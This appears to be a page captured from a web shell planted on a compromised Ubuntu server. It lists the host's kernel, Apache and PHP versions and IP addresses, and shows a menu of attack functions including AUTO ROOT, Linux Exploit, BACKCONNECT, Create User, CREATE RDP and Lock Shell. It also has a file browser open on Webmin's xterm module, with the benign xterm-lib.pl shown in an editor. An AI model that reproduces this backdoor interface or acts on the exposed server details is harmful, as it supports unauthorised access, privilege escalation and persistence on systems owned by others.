Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
webmin /
xterm /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
rc
[ DIR ]
drwxr-xr-x
acl_security.pl
395
B
-rw-r--r--
config
53
B
-rw-r--r--
config.info
591
B
-rw-r--r--
defaultacl
10
B
-rw-r--r--
index.cgi
7.06
KB
-rwxr-xr-x
module.info
176
B
-rw-r--r--
shellserver.pl
4.65
KB
-rwxr-xr-x
websockets-lib-funcs.pl
2.53
KB
-rw-r--r--
xterm-addon-attach.js
1.63
KB
-rw-r--r--
xterm-addon-fit.js
1.45
KB
-rw-r--r--
xterm-lib.pl
886
B
-rw-r--r--
xterm.css
2.18
KB
-rw-r--r--
xterm.js
269.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xterm-lib.pl
# Common functions for the xterm module BEGIN { push(@INC, ".."); }; use WebminCore; &init_config(); our %access = &get_module_acl(); do "$module_root_directory/websockets-lib-funcs.pl"; # config_pre_load(mod-info-ref, [mod-order-ref]) # Check if some config options are conditional, # and if not allowed, remove them from listing sub config_pre_load { my ($modconf_info, $modconf_order) = @_; if ($ENV{'HTTP_X_REQUESTED_WITH'} eq "XMLHttpRequest") { # Process forbidden keys my @forbidden_keys; # Size is not supported in Authentic, because resize works flawlessly and # making it work would just add addition complexity for no good reason push(@forbidden_keys, 'size'); # Remove forbidden from display foreach my $fkey (@forbidden_keys) { delete($modconf_info->{$fkey}); @{$modconf_order} = grep { $_ ne $fkey } @{$modconf_order} if ($modconf_order); } } } 1;
Close